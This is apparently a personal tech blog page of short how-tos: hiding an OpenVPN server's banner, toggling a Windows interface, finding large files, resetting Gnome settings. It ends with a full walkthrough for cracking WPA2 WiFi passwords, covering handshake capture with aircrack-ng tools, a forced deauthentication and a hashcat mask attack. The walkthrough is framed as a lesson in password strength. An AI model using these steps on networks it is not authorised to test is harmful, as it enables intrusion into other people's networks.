How to change the web server identification string of your OpenVPN AS Server on Ubuntu 22.04

The default web server identification string of your OpenVPN Server can be one way to identify it in automated vulnerability scanners such as nmap.

To change it to an arbitrary value to reduce the chance of being identified by vulnerability scanners, you can do the following (as root or sudoer):

cd /usr/local/openvpn_as/scripts
./sacli --key "cs.web_server_name" --value "BLABLABLA" ConfigPut
./sacli start

Source: https://openvpn.net/vpn-server-resources/managing-settings-for-the-web-services-from-the-command-line/

That’s it, Enjoy!

Posted in Linux | Tagged , | Leave a comment

How to enable/disable a network interface on Windows from command line

Assuming “Ethernet” is the name of the network connection you need to enable or disable:

To enable:

netsh interface set interface "Ethernet" enable

To disable:

netsh interface set interface "Ethernet" disable

Posted in Windows | Tagged , , | Leave a comment

Search for files with certain size and extension

I was looking for a large PDF file that was above 100 MB. The file was inside thousands of other files and folders, so I used this command to find it:

find . -type f -size +100M | grep -i pdf

The above simply used the find utility and specified that this is a file and that file is > 100 MB, then I used grep to filter PDF files, that’s it!

Enjoy!

Sources:
https://ostechnix.com/find-files-bigger-smaller-x-size-linux/

Posted in Linux | Tagged , , , | Leave a comment

How to get rid of GLib-GIO-ERROR **: Settings schema ‘***’ does not contain a key on Gnome 40+

In case you mess up the schema for any reason and you are no longer able to open the Gnome settings, e.g. gnome-control-center, just do the following and then logout and back in (or simply reboot):

rm .config/dconf/user

That’s it! Enjoy!

Sources:

https://www.linuxuprising.com/2019/03/how-to-reset-gnome-desktop-settings-to.html

Posted in Linux | Tagged , , , , | Leave a comment

Cracking WiFi keys with Aircrack-ng and hashcat using GPU

Disclaimer

This post is for educational purposes only and should NOT be used otherwise. The primary aim is to understand how a weak WiFi password can be compromised in a few minutes, if not less.

Introduction

In this post I will be explaining how you could easily brute force (masked) a weak WPA2 WiFi password that consists only of 8 digits (as many people do) using a local laptop with an old GPU card in a few minutes. So, probably the first thing you do after reading this (or even before reading) is to create a new password for your WiFi network with more than 8 characters, including numbers, a mix of upper & lower case and special characters.

The use of nvidia GPU here is due to the huge parallelism that can be achieved with it vs CPU, mainly due to the hundreds/thousands of CUDA cores.

Prerequisites

Software Requirements

  • Linux, I’d recommend using Kali or Ubuntu, but it’s totally up to you
  • Aircrack-ng to sniff the packets and record a WPA handshake
  • hashcat to brute force the password
  • hashcat-utils for converting the output to the proper format for hashcat
  • CUDA toolkit 9 or later versions for utilizing the GPU cuda cores for cracking

Hardware Requirements

  • A WiFi card that supports monitoring mode (promiscuous), here are some examples.
  • Any nvidia card with CUDA 9 support

Let’s SNIFF!

Start Monitoring Mode

airmon-ng start <YOUR_WIFI_CARD_NAME_FROM_IWCONFIG>

Monitor and list all networks around you

airodump-ng <YOUR_WIFI_MONITORING_INTERFACE> #usually wlan0mon

CH 3 ][ Elapsed: 30 s ][ 2021-05-19 04:25
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
E4:FB:5D:00:2B:E0 -87 38 1 0 8 130 WPA2 CCMP PSK MYHome
54:39:DF:7C:83:B8 -86 39 0 0 6 130 WPA2 CCMP PSK Qtel-BB1
48:F9:B3:B7:A2:64 -80 28 1 0 8 195 WPA CCMP PSK BAMB 2
D8:48:0B:54:56:0D -84 17 0 0 11 130 WPA2 CCMP PSK Qtel-BB-2
02:26:89:70:BD:1D -84 5 0 0 6 130 WPA CCMP PSK dlink

Capturing Packets

To start capturing packets from MYHome for example:

airodump-ng -c 8 --bssid E5:FB:5D:00:2A:E0 -w MYHome.out wlan0mon #wait till a full handshake occurs between a client and the network

What to do if NO handshake occurs

If a handshake doesn’t occur after waiting for some time, you can force it in another terminal (but take care you are moving from passive attack to active now and you might get detected):

aireplay-ng -0 2 -a E4:FB:5D:00:2B:E0 wlan0mon

What to do if a handshake occurs

When on the top right you see a message that a handshake occured, you have to convert the cap file to a format recognized by hashcat (using hashcat-utils which are downloaded separately):

cap2hccapx.bin MYHome.out-01.cap MYHome.hccapx

Let’s crack it!

hashcat.bin -m 2500 -a3 MYHome.hccapx -1 ?l?u -2 ?l?u?d ?d?d?d?d?d?d?d?d -w 3 # -w makes GPU utilization 100%, but may freeze your screen

The above is just an example for a masked attack, which is way better than the regular Brute Force one (kind of optimized brute force). Your playground is the mask (in bold in the previous command), which you can consider as an art, since you have to guess the range of the passwords. For this article, I made all the mask as digits, i.e. 8 numbers between 0 and 9.

Advanced Tip: -1 and -2 (can also use -3 and -4) are custom charsets that can be composed out of the charsets below. If you want for example to indicate that a character would be either a small or capital letter, then use -1 ?l?u and then use 1 in the mask.

This is a list that shows all the available charsets supported by hashcat as of now

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?h = 0123456789abcdef
?H = 0123456789ABCDEF
?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s
?b = 0x00 - 0xff

In case of a successful crack, hashcat will exit with Status: Cracked and will show you the password.

Enjoy!

Sources

Posted in Linux | Tagged , , , , , , , , , , , | Leave a comment